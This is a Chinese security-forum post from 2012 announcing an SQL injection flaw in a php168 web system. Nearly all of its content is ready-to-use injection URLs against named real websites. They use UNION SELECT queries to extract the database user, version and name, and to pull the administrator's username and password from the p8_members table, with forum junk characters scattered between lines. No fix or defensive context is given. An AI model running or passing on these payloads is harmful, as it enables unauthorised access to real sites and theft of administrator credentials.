找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3117|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
& y5 P4 Z# ]! y! K2 d6 U  P& R                                                         
, `% F9 A; h; K: U% i- U; b2 |                                       3 w: j5 \0 y' |1 ?/ k" I9 L; g

( ^6 e7 d3 o8 F6 S8 s
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--: h2 v# D4 \0 d) y
                                                     $ e! L6 B; h5 Z: j! y
                                                                   ! C7 V) y0 g; `3 @
                                                        - Q& Z6 S! v; q2 v0 a
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
( A) [5 k7 v, H& S) V' j9 }
0 o' [/ ?% A! m4 U& f& V) P
  W2 {, Y3 \9 ]2 t+ U
  [; T' n. }% w* d) w                                                            * [9 i7 F7 v- z4 k6 R5 {

" \1 R' w% ^3 X) rhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--0 y$ R, J4 T, r2 _0 I

! X  d1 C1 e: W: v8 ]1 x( j8 L$ @' B+ Q8 X

9 ^5 m- {- A/ q+ w% _# O                                                                    
1 I+ x5 m- ~4 a9 a% ]8 P

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表